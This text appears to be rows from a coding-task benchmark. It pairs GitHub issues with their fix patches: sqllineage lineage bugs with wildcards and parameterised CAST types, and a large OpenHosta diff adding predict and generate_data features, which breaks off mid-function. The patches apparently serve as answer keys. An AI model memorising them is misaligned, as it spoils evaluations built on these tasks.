For this case, we actually should throw exception because there're parsing errors. Later if this proves to be valid syntax, we can fix the parser.
You found a typo in my example. I fixed it. The bug still remains.
Now with #429 merged, we will raise InvalidSyntaxException for previously buggy sql:
```sql
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS CUST AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
```
```
$ sqllineage -f test.sql --dialect=tsql -l column
...
sqllineage.exceptions.InvalidSyntaxException: This SQL statement is unparsable, please check potential syntax error for SQL:
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS CUST AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
Line 4, Position 27: Found unparsable section: 'AS CUST\nLEFT JOIN T_SALES AS SALES\nON CU...'
```
Back to this story, the problem is still limited to second statement. It seems we have some issue handling alias with SELECT INTO statement. Using code in master branch, this is the output:
```
$ sqllineage -f test.sql --dialect=tsql -l column
<default>.#temp_final_results.cum_sales <- <default>.t_sales.cum_sales
<default>.#temp_final_results.cust.* <- cust.*
```
Whereas the expected output should be:
```
<default>.#temp_final_results.cum_sales <- <default>.t_sales.cum_sales
<default>.#temp_final_results.* <- <default>.#temp_customers.*
```
The problem is not with SELECT INTO, rather all qualified wildcard suffered from the same issue:
```sql
INSERT INTO tab1
SELECT tab2.*
FROM tab2 a
INNER JOIN tab3 b
ON a.id = b.id
```
```
<default>.tab1.tab2.* <- tab2.*
```
The correct output should be:
```
<default>.tab1.* <- <default>.tab2.*
``` | 2023-08-13T10:51:06 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-420 | e72aa11c5dc14c3d58b3b357f29290e5d69f7c91 | diff --git a/sqllineage/core/parser/sqlparse/models.py b/sqllineage/core/parser/sqlparse/models.py
index adda43f3..d5fa9388 100644
--- a/sqllineage/core/parser/sqlparse/models.py
+++ b/sqllineage/core/parser/sqlparse/models.py
@@ -152,7 +152,7 @@ def _extract_source_columns(token: Token) -> List[ColumnQualifierTuple]:
elif isinstance(token, Identifier):
real_name = token.get_real_name()
# ignore function dtypes that don't need to check for extract column
- FUNC_DTYPE = ["decimal", "numeric"]
+ FUNC_DTYPE = ["decimal", "numeric", "varchar"]
has_function = any(
isinstance(t, Function) and t.get_real_name() not in FUNC_DTYPE
for t in token.tokens
| Column lineage does not work for CAST to Parameterized Data Type
I guess the issus is that "Type(*)" is recognized as a subquery, instead of a type in "CAST(col AS Type(*))"
Input SQL:
```
INSERT
OVERWRITE tbl_dst(col1, col2)
SELECT
CAST(name AS VARCHAR) AS col1,
CAST(age AS VARCHAR(35)) AS col2,
FROM
tbl_src
```
Expected Output:
```
<default>.tbl_dst.col1 <- name
<default>.tbl_dst.col2 <- age
```
Current Output:
`<default>.tbl_dst.col1 <- name`
| You're right. We don't support parameterized data type yet. Also `decimal(18, 0)` doesn't work while `decimal` works. It's the same reason behind.
This is a bug we should fix. | 2023-07-30T15:34:04 | 0.0 | [] | [] |
||
hand-e-fr/OpenHosta | hand-e-fr__OpenHosta-168 | 87cd5cdc10632b0f60fb76f0d0bd4d256860e907 | diff --git a/README.md b/README.md
index 3c193e2..abd4310 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v2.0.2 - Opensource Project
+v2.1.0rc-1 - Opensource Project
**- The future of development is human -**
@@ -79,7 +79,7 @@ For further questions or assistance, please refer to partner hand-e or contact u
**Authors**:
- Emmanuel Batt: Manager and Coordinator, Founder of Hand-e
- William Jolivet: DevOps, SysAdmin
- - Léandre Ramos: MLOps, IA developer
+ - Léandre Ramos: IA developer
- Merlin Devillard: UX designer, Product Owner
GitHub: https://github.com/hand-e-fr/OpenHosta
diff --git a/docs/doc.md b/docs/doc.md
index e698170..c8efa53 100644
--- a/docs/doc.md
+++ b/docs/doc.md
@@ -79,8 +79,16 @@ Let's **get started**! First here's the **table of contents** to help you naviga
- [Body Functions](#body-functions)
- [`Example`](#example)
- [`Thought`](#thought)
+ - [`predict` Function](#predict-function)
+ - [PredictConfig](#predictconfig-class)
- [`thinkof` Function](#thinkof-function)
- [`ask` function](#ask-function)
+ - [`generate_data` func](#generate_data-func)
+ - [Parameters](#parameters)
+ - [Returns](#returns)
+ - [Raises](#raises)
+ - [Example](#example)
+ - [How It Works](#how-it-works)
- [Advanced configuration](#advanced-configuration)
- [Models](#models)
- [Inheriting from the Model Class](#inheriting-from-the-model-class)
@@ -182,7 +190,7 @@ from typing import List
def example_function(a:int, b:str)->List[str]:
```
- - **The doctring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
+ - **The docstring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
```python
my_model = config.Model(
@@ -205,7 +213,7 @@ def find_name_age(sentence:str, id:dict)->dict:
"""
return emulate(model=my_model)
-ret = find_name_age("l'âge du capitaine est d'un an de plus que celui du mousse qui a lui 22 ans", {"capitaine": 0, "mousse": 0})
+ret = find_name_age("the captain's age is one year more than the cabin boy's, who is 22 years old", {"captain": 0, "cabin boy": 0})
print(ret)
```
@@ -353,6 +361,141 @@ print(car_advice("I would two buy a new car, but I would like an electric becaus
# [{'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}, {'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}]
```
+## `predict` Function
+
+The `predict` function is the second main feature of OpenHosta ! This function allows you to create **specific neural networks** based on the specifications you provide. Here's a breakdown to help you understand it:
+
+
+
+The `predict` function can be used in function or class method by simply returns it. Its primary goal is to create a model tailored to the function it is called in. Currently, it supports two model types:
+
+- **Linear Regression**: For prediction tasks by simply returns an `int`or a `float` :
+ ```python
+ from Openhosta import predict, config
+
+ config.set_default_apiKey("put-your-api-key-here")
+
+ def example_linear_regression(years : int, profession : str) -> float:
+ """
+ this function predict the salary based on the profession years.
+ """
+ return predict(verbose=2)
+
+ print(example_linear_regression(1, "engineer"))
+ ```
+- **Classification**: For classifying multiple values among predefined categories in a `Literal` from the typing module :
+ ```python
+ from typing import Literal
+ from Openhosta import predict, config
+
+ config.set_default_apiKey("put-your-api-key-here")
+
+ output = Literal["Good", "Bad"]
+
+ def example_classification(word: str) -> output:
+ """
+ this function detects if a words is good or bad
+ """
+ return predict(verbose=2)
+
+ print(example_classification("Bad"))
+ ```
+
+
+Additionally like you can see, `predict` can generate a dataset if none is provided in the [PredictConfig](#predictconfig-class), allowing users to see how a large language model (LLM) understands the problem and generates relevant data. By default, the data generation uses GPT-4o by OpenAI, the same oracle used in the [emulate](#emulate-function) function .
+
+
+
+### Parameters
+The `predict` function supports the following parameters:
+
+- `verbose`: Controls the level of output information:
+ - `0`: No output.
+ - `1`: Basic output (default).
+ - `2`: Detailed output.
+
+
+
+- `oracle`: Specifies the model used for data generation. If set to `None`, no model will be used to handle missing data generation.
+
+- `config`: Accepts a `Predictconfig` object for advanced configuration of model creation.
+
+## `PredictConfig` class
+
+The `PredictConfig` class provides advanced options for configuring the creation and management of *predict* models. Here’s a detailed breakdown:
+
+```python
+from Openhosta import PredictConfig
+
+model_config = PredictConfig(
+ name="model_test",
+ path="./__hostacache__",
+ complexity=5,
+ growth_rate=1.5,
+ coef_layers=100,
+ epochs=100,
+ batch_size=32,
+ max_tokens=1,
+ dataset_path="./path_to_dataset.csv",
+ generated_data=100,
+ normalize=False
+)
+```
+
+### Features
+
+#### **Path Management**
+- `path` (`str`): Specifies where data will be stored. Default: `./__hostacache__/`.
+- `name` (`str`): Sets the directory name for storing model-related information. Default: the name of the Hosta-injected function.
+
+#### **Architecture Configuration**
+- `complexity` (`int`): Adjusts the model's complexity by adding or removing layers. Default: `5`.
+- `growth_rate` (`float`): Determines the rate of increase in layer size. Default: `1.5`.
+- `coef_layers` (`int`): Defines the maximum possible layer size based on the highest value between inputs and outputs. Default: `100`.
+
+#### **Training Configuration**
+- `normalize` (`bool`) : Specify if the data for training need to be normalize between -1 and 1. Default False, only possible with **Linear Regression** models
+- `epochs` (`int`): Sets the number of training iterations. Default: calculated based on dataset size and batch size.
+- `batch_size` (`int`): Specifies the number of examples processed before weight updates. Default: 5% of the dataset size if possible.
+
+#### **Dataset Management**
+- `max_tokens` (`int`): Limits the number of words a `str` input can contain, as the model adapts neuron sizes accordingly. Default: `1`.
+ - **Warning**: Current model architectures do not perform well with natural language processing tasks. For such cases, use the *emulate* feature instead. NLP architecture support is coming soon.
+- `dataset_path` (`str`): Provides a custom dataset path. Default: `None`,
+ - **Warning**: Only `csv` and `jsonl` files are supported for now. For `csv`, please set the prediction columns to `_outputs`. and for `jsonl` please set the last element
+- `generated_data` (`int`): Specifies the target number of data points for LLM generation (approximate). Default: `100`.
+
+---
+
+### Example Usage
+
+```python
+from OpenHosta import predict, PredictConfig
+
+# Configuring the model
+config_predict = PredictConfig(
+ path="./__hostacache__",
+ name="test_openhosta",
+ complexity=5,
+ growth_rate=1.5,
+ layers_coefficien=100,
+ epochs=45,
+ batch_size=64,
+ max_tokens=1,
+ dataset_path="./dataset.csv",
+ normalize=False
+)
+
+# Using the predict function with the configuration
+def demo_open_hosta(number: int, message: str) -> int:
+ """
+ this function is just here for an example :)
+ """
+ return predict(config=config_predict, oracle=None, verbose=2)
+
+print(demo_open_hosta(42, "Hello World!"))
+```
+
## `thinkof` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -433,6 +576,83 @@ As seen above takes 2 or more argument. The two first arguments are mandatory. `
**Note** : ***this feature uses the default model.***
+## `generate_data` func
+
+Generate a dataset based on a given function and the number of samples. This function uses a synthetic data generator to create realistic input-output pairs for a given callable Python function based on its defined parameters, examples, and return type.
+
+### Parameters
+
+- **`func`** (`Callable`):
+ The target function used to generate the dataset. This function must take specific inputs and return outputs to be used for creating the dataset.
+ Proper type annotations and a clear docstring for the `func` are recommended to enhance the quality of generated data.
+
+- **`num_samples`** (`int`):
+ The number of samples to generate. If the number exceeds 100, the function intelligently splits the data requests into manageable chunks.
+
+- **`oracle`** (`Optional[Model]`, Optional):
+ The model or "oracle" used to assist with generating synthetic data.
+ By default, the function uses the system's predefined default model.
+
+- **`verbose`** (`Union[Literal[0, 1, 2], bool]`, default=`2`):
+ Defines the verbosity level for logging the data generation process:
+ - `0` or `False`: No logging.
+ - `1`: Minimal logging.
+ - `2` or `True`: Detailed logging, providing insights during data generation.
+
+### Returns
+
+- **`HostaDataset`**:
+ An instance of `HostaDataset`, representing the generated dataset. This dataset can be saved to disk (CSV, JSON, JSONL) or iterated over for input-output pairs.
+
+### Raises
+
+- **`TypeError`**:
+ Raised if the provided `func` is not callable or lacks sufficient information to generate data (such as missing type annotations).
+
+### Example
+
+The following example demonstrates how to define a function, generate synthetic data using `generate_data`, and save the resulting dataset.
+
+```python
+from typing import Literal
+from OpenHosta import generate_data, HostaDataset, example, emulate, SourceType
+
+def detect_mood(message: str) -> Literal["positive", "negative", "neutral"]:
+ """
+ Analyze the mood conveyed in a text message.
+ """
+ # Provide pre-defined examples to guide synthetic data generation
+ example(message="I feel lonely...", hosta_out="negative")
+ example(message="I am happy!", hosta_out="positive")
+ example(message="I have a cat", hosta_out="neutral")
+ return emulate()
+
+# Generate a dataset with 50 examples
+dataset: HostaDataset = generate_data(detect_mood, 50)
+
+# Save the dataset as a CSV file
+dataset.save_data("detect_mood.csv", SourceType.CSV)
+
+# Print each input-output pair in the dataset
+correct = 0
+
+for data in dataset.data:
+ print(f"{data.input[0].strip('"')} expected {data.output} got {detect_mood(data.input[0].strip('"'))}")
+ if data.output == detect_mood(data.input[0].strip('"')):
+ correct += 1
+
+print(f"Accuracy: {correct}/{len(dataset.data)}, {correct/len(dataset.data)*100}%")
+```
+
+### How It Works
+
+- **Define the Function**:
+ The target function (`detect_mood` in the example) must be well-defined, preferably with type annotations and examples to guide the data generation process.
+- **Generate Synthetic Data**:
+ Use `generate_data` to produce a dataset by specifying the number of samples and optionally overriding the default model with a custom `oracle`.
+- **Save or Process Dataset**:
+ The returned dataset (`HostaDataset` instance) provides methods to save it in various formats (CSV, JSON, JSONL) or iterate over its contents for further analysis.
+
## Advanced configuration
### Models
@@ -522,8 +742,8 @@ class MyModel(Model):
return l_ret
new_model = MyModel(
- model="model-name"
- base_url="base-url"
+ model="model-name",
+ base_url="base-url",
api_key="put-your-api-key-here"
)
diff --git a/pyproject.toml b/pyproject.toml
index e75f9c8..a17d697 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -18,12 +18,27 @@ license = {file = "LICENSE"}
requires-python = ">=3.8,<=3.13"
classifiers = [
"Development Status :: 5 - Production/Stable",
+ "Programming Language :: Python",
+ "Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: 3.12",
+ "Programming Language :: Python :: 3.13",
+ "Programming Language :: Python :: Implementation :: CPython",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
+ "Intended Audience :: Science/Research",
+ "Intended Audience :: Education",
"Natural Language :: French",
- "Topic :: Software Development :: Code Generators"
+ "Natural Language :: English",
+ "Topic :: Software Development :: Code Generators",
+ "Topic :: Scientific/Engineering",
+ "Topic :: Scientific/Engineering :: Artificial Intelligence",
+ "Topic :: Software Development :: Libraries",
+ "Typing :: Typed"
]
dependencies = [
"requests>=2.32.3",
diff --git a/qodana.yaml b/qodana.yaml
new file mode 100644
index 0000000..84e3e49
--- /dev/null
+++ b/qodana.yaml
@@ -0,0 +1,29 @@
+#-------------------------------------------------------------------------------#
+# Qodana analysis is configured by qodana.yaml file #
+# https://www.jetbrains.com/help/qodana/qodana-yaml.html #
+#-------------------------------------------------------------------------------#
+version: "1.0"
+
+#Specify inspection profile for code analysis
+profile:
+ name: qodana.starter
+
+#Enable inspections
+#include:
+# - name: <SomeEnabledInspectionId>
+
+#Disable inspections
+#exclude:
+# - name: <SomeDisabledInspectionId>
+# paths:
+# - <path/where/not/run/inspection>
+
+#Execute shell command before Qodana execution (Applied in CI/CD pipeline)
+#bootstrap: sh ./prepare-qodana.sh
+
+#Install IDE plugins before Qodana execution (Applied in CI/CD pipeline)
+#plugins:
+# - id: <plugin.id> #(plugin id can be found at https://plugins.jetbrains.com)
+
+#Specify Qodana linter for analysis (Applied in CI/CD pipeline)
+linter: jetbrains/qodana-python:latest
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 81e861f..fbc6850 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -6,10 +6,15 @@
from .exec.thought import thought
from .exec.example import example
from .exec.emulate import emulate
+from .exec.generate_data import generate_data
+from .exec.predict.dataset.dataset import HostaDataset, SourceType
from .core import config
from .core.config import Model, DefaultManager
from .utils.meta_prompt import print_last_prompt
+from .exec.predict.predict import predict
+from .exec.predict.predict_config import PredictConfig
+
import os
DefaultManager.set_default_model(
@@ -22,8 +27,13 @@
"emulate",
"thought",
"example",
+ "predict",
+ "PredictConfig",
"thinkof",
"ask",
"EMULATE_PROMPT",
- "print_last_prompt"
+ "print_last_prompt",
+ "generate_data",
+ "HostaDataset",
+ "SourceType"
)
diff --git a/src/OpenHosta/core/analizer.py b/src/OpenHosta/core/analizer.py
index ca7b346..537d8a8 100644
--- a/src/OpenHosta/core/analizer.py
+++ b/src/OpenHosta/core/analizer.py
@@ -145,10 +145,10 @@ def func_call(self) -> Tuple[str, OrderedDict[str, Any]]:
@property
def func_type(self) -> Tuple[List[Any], Any]:
"""
- Get the _inputs and _outputs types of the function.
+ Get the inputs and outputs types of the function.
Returns:
- A tuple containing the _inputs types and _outputs type.
+ A tuple containing the inputs types and outputs type.
"""
input_types = [
param.annotation for param in self.sig.parameters.values()
diff --git a/src/OpenHosta/core/checker.py b/src/OpenHosta/core/checker.py
index 06a11db..7778ea3 100644
--- a/src/OpenHosta/core/checker.py
+++ b/src/OpenHosta/core/checker.py
@@ -15,15 +15,15 @@
class HostaChecker:
"""
- A class used to check and convert the _outputs of a Language Model (LLM) to the type specified in a function's annotation.
+ A class used to check and convert the outputs of a Language Model (LLM) to the type specified in a function's annotation.
Args:
- func (Func): A function object that contains the type annotations for the LLM _outputs.
- data (dict): A dictionary containing the LLM _outputs data to be checked and converted.
+ func (Func): A function object that contains the type annotations for the LLM outputs.
+ data (dict): A dictionary containing the LLM outputs data to be checked and converted.
Attributes:
- func (Func): The function object containing the type annotations for the LLM _outputs.
- data (dict): The LLM _outputs data to be checked and converted.
+ func (Func): The function object containing the type annotations for the LLM outputs.
+ data (dict): The LLM outputs data to be checked and converted.
checked (Any): The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
is_passed (bool): A flag indicating whether the checked data should be converted or not. It is set to True if `data` contains a "return" key.
"""
@@ -50,7 +50,7 @@ def _default(x: Any) -> Any:
"""
return x
- def convert(self, typ: Type[T]) -> Dict[Type[T], Optional[Callable[[Any], T]]]:
+ def convert(self, typ: Type[T]) -> Callable[[Any], T]:
"""
A method to create a conversion function for a given type.
@@ -58,25 +58,23 @@ def convert(self, typ: Type[T]) -> Dict[Type[T], Optional[Callable[[Any], T]]]:
typ (Type[T]): The type for which a conversion function needs to be created.
Returns:
- Dict[Type[T], Optional[Callable[[Any], T]]]: A dictionary mapping types to their corresponding conversion functions.
+ Callable[[Any], T]: A conversion function for the given type.
"""
- convertMap = {
+ convert_map = {
NoneType: lambda x: None,
- str: lambda x: str(x),
- int: lambda x: int(x),
- float: lambda x: float(x),
- list: lambda x: list(x),
- set: lambda x: set(x),
- frozenset: lambda x: frozenset(x),
- tuple: lambda x: tuple(x),
- bool: lambda x: bool(x),
- dict: lambda x: dict(x),
- complex: lambda x: complex(x),
+ str: str,
+ int: int,
+ float: float,
+ list: list,
+ set: set,
+ frozenset: frozenset,
+ tuple: tuple,
+ bool: bool,
+ dict: dict,
+ complex: complex,
bytes: lambda x: bytes(x, encoding='utf-8') if isinstance(x, str) else bytes(x),
}
- if typ not in convertMap.keys():
- return self._default.__func__
- return convertMap[typ]
+ return convert_map.get(typ, self._default.__func__)
def convert_annotated(self) -> Any:
"""
diff --git a/src/OpenHosta/core/config.py b/src/OpenHosta/core/config.py
index df47b6f..fa1563a 100644
--- a/src/OpenHosta/core/config.py
+++ b/src/OpenHosta/core/config.py
@@ -30,10 +30,11 @@ class Model:
_SYS_PROMPT = ""
- def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
+ def __init__(self, model: str = None, base_url: str = None, api_key: str = None, timeout: int = 30):
self.model = model
self.base_url = base_url
self.api_key = api_key
+ self.timeout = timeout
self._last_request = None
self._used_tokens = 0
self._nb_requests = 0
@@ -86,7 +87,7 @@ def api_call(
for key, value in llm_args.items():
l_body[key] = value
try:
- response = requests.post(self.base_url, headers=headers, json=l_body, timeout=30)
+ response = requests.post(self.base_url, headers=headers, json=l_body, timeout=self.timeout)
if response.status_code != 200:
response_text = response.text
diff --git a/src/OpenHosta/core/hosta.py b/src/OpenHosta/core/hosta.py
index 37933b7..8450634 100644
--- a/src/OpenHosta/core/hosta.py
+++ b/src/OpenHosta/core/hosta.py
@@ -59,10 +59,10 @@ def __new__(cls, *args, **kwargs) -> 'Hosta':
"[Hosta.__new__] The function {} must be called in a function/method."
.format(cls._extend(back_level=2)[0].__name__)
)
- if (hasattr(cls._obj[0], "Hosta")):
+ if hasattr(cls._obj[0], "Hosta"):
return cls._obj[0].Hosta
instance = super().__new__(cls)
- cls._attach(cls._obj[0], {"Hosta": instance})
+ cls.attach(cls._obj[0], {"Hosta": instance})
return instance
def __init__(self, *, caller_analysis: bool = True):
@@ -122,17 +122,16 @@ def _bdy_add(self, key: MemKey, value: MemValue) -> None:
value (MemValue): The value to be stored in the memory node.
"""
seen: List[MemKey] = []
- previous: MemKey = None
if self._infos.f_mem is None:
self._infos.f_mem = []
- id = 0
+ mem_id = 0
else:
- id = 0
+ mem_id = 0
for node in self._infos.f_mem:
if node.key == key:
- id += 1
- new = MemoryNode(key=key, id=id, value=value)
+ mem_id += 1
+ new = MemoryNode(key=key, id=mem_id, value=value)
self._infos.f_mem.append(new)
previous = new
for node in self._infos.f_mem:
diff --git a/src/OpenHosta/core/inspector.py b/src/OpenHosta/core/inspector.py
index ffc6819..bf84883 100644
--- a/src/OpenHosta/core/inspector.py
+++ b/src/OpenHosta/core/inspector.py
@@ -128,10 +128,10 @@ def _get_obj_from_func(
raise FrameError(
"[HostaInspector._extend] The foud object isn't a callable.")
- return (func, caller)
+ return func, caller
@staticmethod
- def _attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
+ def attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
"""
Attaches attributes to a function or method.
diff --git a/src/OpenHosta/core/logger.py b/src/OpenHosta/core/logger.py
new file mode 100644
index 0000000..c79b6c6
--- /dev/null
+++ b/src/OpenHosta/core/logger.py
@@ -0,0 +1,108 @@
+from typing import Union, Literal, Optional
+from enum import Enum
+import platform
+
+IS_UNIX = platform.system() != "Windows"
+
+class ANSIColor(Enum):
+ RESET = '\033[0m'
+ BLACK = '\033[30m'
+ RED = '\033[31m'
+ GREEN = '\033[32m'
+ YELLOW = '\033[33m'
+ BLUE = '\033[34m'
+ PURPLE = '\033[35m'
+ CYAN = '\033[36m'
+ WHITE = '\033[37m'
+
+ # Bold colors
+ BLACK_BOLD = '\033[1;30m'
+ RED_BOLD = '\033[1;31m'
+ GREEN_BOLD = '\033[1;32m'
+ YELLOW_BOLD = '\033[1;33m'
+ BLUE_BOLD = '\033[1;34m'
+ PURPLE_BOLD = '\033[1;35m'
+ CYAN_BOLD = '\033[1;36m'
+ WHITE_BOLD = '\033[1;37m'
+
+ # Bright (light) colors
+ BRIGHT_BLACK = '\033[90m'
+ BRIGHT_RED = '\033[91m'
+ BRIGHT_GREEN = '\033[92m' # Bright/Light Green
+ BRIGHT_YELLOW = '\033[93m'
+ BRIGHT_BLUE = '\033[94m'
+ BRIGHT_PURPLE = '\033[95m'
+ BRIGHT_CYAN = '\033[96m'
+ BRIGHT_WHITE = '\033[97m'
+
+ UNDERLINE = '\033[4m'
+ REVERSED = '\033[7m'
+
+class Logger:
+ def __init__(self, log_file_path: Optional[str] = None, verbose: Union[Literal[0, 1, 2], bool] = 2):
+ self.log_file_path: Optional[str] = log_file_path
+ if log_file_path:
+ self.log_file = open(log_file_path, "w")
+ self.log_file.close()
+ self.verbose = verbose if isinstance(verbose, int) else 2 if verbose else 0
+ assert self.verbose is not None and 0 <= self.verbose <= 2, "Please provide a valid verbose level (0, 1 or 2) default is 2"
+
+ def _log(
+ self,
+ prefix: str,
+ message: str,
+ level: int = 1,
+ color: ANSIColor = ANSIColor.BRIGHT_GREEN,
+ text_color: ANSIColor = ANSIColor.RESET,
+ one_line : bool = False
+ ):
+ """
+ Internal logging method.
+ :param prefix: The prefix for the log message
+ :param message: The message to log
+ :param level: The verbose level (0: Essential, 1: Normal, 2: Debug)
+ :param color: The color to use for the prefix
+ """
+ if level <= self.verbose:
+ if one_line and IS_UNIX:
+ print(f"{ANSIColor.RESET.value}[{color.value}{prefix}{ANSIColor.RESET.value}] {text_color.value}{message}", end="\r")
+ else:
+ print(f"{ANSIColor.RESET.value}[{color.value}{prefix}{ANSIColor.RESET.value}] {text_color.value}{message}")
+ if self.log_file_path:
+ with open(self.log_file_path, 'a', encoding='utf-8') as log_file:
+ log_file.write(f"[{prefix}] {message}" + "\n")
+
+ def log_error(self, message: str, level: int = 1):
+ self._log("Error", message, level, ANSIColor.BRIGHT_RED, ANSIColor.BRIGHT_RED)
+
+ def log_critical(self, message: str, level: int = 1):
+ self._log("Critical", message, level, ANSIColor.RED, ANSIColor.BRIGHT_RED)
+
+ def log_exception(self, exception: Exception, level: int = 1):
+ self._log("Exception", str(exception), level, ANSIColor.BRIGHT_RED, ANSIColor.BRIGHT_RED)
+
+ def log_warning(self, message: str, level: int = 1):
+ self._log("Warning", message, level, ANSIColor.BRIGHT_YELLOW, ANSIColor.BRIGHT_YELLOW)
+
+ def log_info(self, message: str, level: int = 1):
+ self._log("Info", message, level, ANSIColor.BRIGHT_BLUE)
+
+ def log_success(self, message: str, level: int = 1):
+ self._log("Success", message, level, ANSIColor.BRIGHT_GREEN)
+
+ def log_debug(self, message: str, level: int = 2):
+ self._log("Debug", message, level, ANSIColor.BRIGHT_PURPLE)
+
+ def log_verbose(self, message: str, level: int = 2):
+ self._log("Verbose", message, level, ANSIColor.BRIGHT_CYAN)
+
+ def log_custom(
+ self,
+ prefix: str,
+ message: str,
+ level: int = 1,
+ color: ANSIColor = ANSIColor.BRIGHT_GREEN,
+ text_color: ANSIColor = ANSIColor.RESET,
+ one_line : bool = False
+ ):
+ self._log(prefix, message, level, color, text_color, one_line)
diff --git a/src/OpenHosta/core/pydantic_usage.py b/src/OpenHosta/core/pydantic_usage.py
index 807e3cc..289a8d0 100644
--- a/src/OpenHosta/core/pydantic_usage.py
+++ b/src/OpenHosta/core/pydantic_usage.py
@@ -37,7 +37,7 @@ class Func(BaseModel):
f_doc: str = Field(default="", description="Documentation of the function, e.g., 'This function returns the sum of two integers.'")
f_call: str = Field(default="", description="Actual call of the function, e.g., 'func(1, 'hello')'")
f_args: Dict[str, Any] = Field(default_factory=dict, description="Arguments of the function, e.g., {'a': 1, 'b': 'hello'}")
- f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and _outputs of the function")
+ f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and outputs of the function")
f_schema: Dict[str, Any] = Field(default_factory=dict, description="Dictionary describing the function's return type (in case of pydantic).")
f_sig: Optional[inspect.Signature] = Field(default=None, description="Signature of the function")
f_locals: Optional[Dict[str, Any]] = Field(default=None, description="Local variables within the function's scope")
diff --git a/src/OpenHosta/exec/emulate.py b/src/OpenHosta/exec/emulate.py
index f732886..e20d245 100644
--- a/src/OpenHosta/exec/emulate.py
+++ b/src/OpenHosta/exec/emulate.py
@@ -47,7 +47,6 @@ def emulate(
**llm_args
) -> Any:
x = None
- l_ret: Any = None
if _infos is None:
x = Hosta()
@@ -59,19 +58,19 @@ def emulate(
model = DefaultManager.get_default_model()
if x:
- x._attach(_infos.f_obj, {
+ x.attach(_infos.f_obj, { # type: ignore
"_last_request": None,
"_last_response": None
})
try:
if x:
- x._attach(_infos.f_obj, {"_last_request": {
+ x.attach(_infos.f_obj, {"_last_request": { # type: ignore
'sys_prompt':f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
'user_prompt':_infos.f_call
}
}
- )
+ )
response = model.simple_api_call(
sys_prompt=f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
user_prompt=_infos.f_call,
@@ -79,7 +78,7 @@ def emulate(
)
if x:
- x._attach(_infos.f_obj, {"_last_response": response})
+ x.attach(_infos.f_obj, {"_last_response": response}) # type: ignore
l_ret = model.request_handler(response, _infos)
if post_callback is not None:
diff --git a/src/OpenHosta/exec/example.py b/src/OpenHosta/exec/example.py
index f21f751..d8d70b2 100644
--- a/src/OpenHosta/exec/example.py
+++ b/src/OpenHosta/exec/example.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from typing import Any, get_args
+from typing import Any, get_args, get_origin, Literal
from ..core.hosta import Hosta, ExampleType
@@ -15,6 +15,7 @@ def example(*args, hosta_out: Any = None, **kwargs):
expected_return_type = x._infos.f_type[1]
if not (
+ get_origin(expected_return_type) is Literal or
isinstance(hosta_out, expected_return_type) or
(expected_return_type == float and isinstance(hosta_out, int)) or
hosta_out in get_args(expected_return_type) or
diff --git a/src/OpenHosta/exec/generate_data.py b/src/OpenHosta/exec/generate_data.py
new file mode 100644
index 0000000..2a3b0f1
--- /dev/null
+++ b/src/OpenHosta/exec/generate_data.py
@@ -0,0 +1,56 @@
+import inspect
+from typing import Callable, Optional, Union, Literal
+
+from .predict.dataset.dataset import HostaDataset
+from .predict.dataset.oracle import LLMSyntheticDataGenerator
+from ..core.config import Model, DefaultModel
+from ..core.hosta import Func
+from ..core.logger import Logger
+
+
+def _analyze_function(func: Callable) -> Func:
+ if not callable(func):
+ raise TypeError("The provided object is not a function or callable.")
+
+ func_obj = Func()
+ func_obj.f_name = func.__name__
+ func_obj.f_doc = func.__doc__ if func.__doc__ else ""
+ func_obj.f_sig = inspect.signature(func)
+
+ arg_types = {}
+ input_types = []
+
+ for name, param in func_obj.f_sig.parameters.items():
+ param_type = param.annotation if param.annotation != inspect.Parameter.empty else None
+ arg_types[name] = {
+ "type": param_type,
+ "default": param.default if param.default != inspect.Parameter.empty else None
+ }
+ input_types.append(param_type)
+
+ func_obj.f_args = arg_types
+ return_type = func_obj.f_sig.return_annotation if func_obj.f_sig.return_annotation != inspect.Signature.empty else None
+ func_obj.f_type = (input_types, return_type)
+ func_obj.f_mem = None
+
+ return func_obj
+
+
+def generate_data(
+ func: Callable,
+ ammount: int,
+ oracle: Optional[Model] = None,
+ verbose: Union[Literal[0, 1, 2], bool] = 2
+):
+ logger: Logger = Logger(verbose=verbose)
+ request_amounts = int(ammount / 100) if ammount > 100 else 1
+
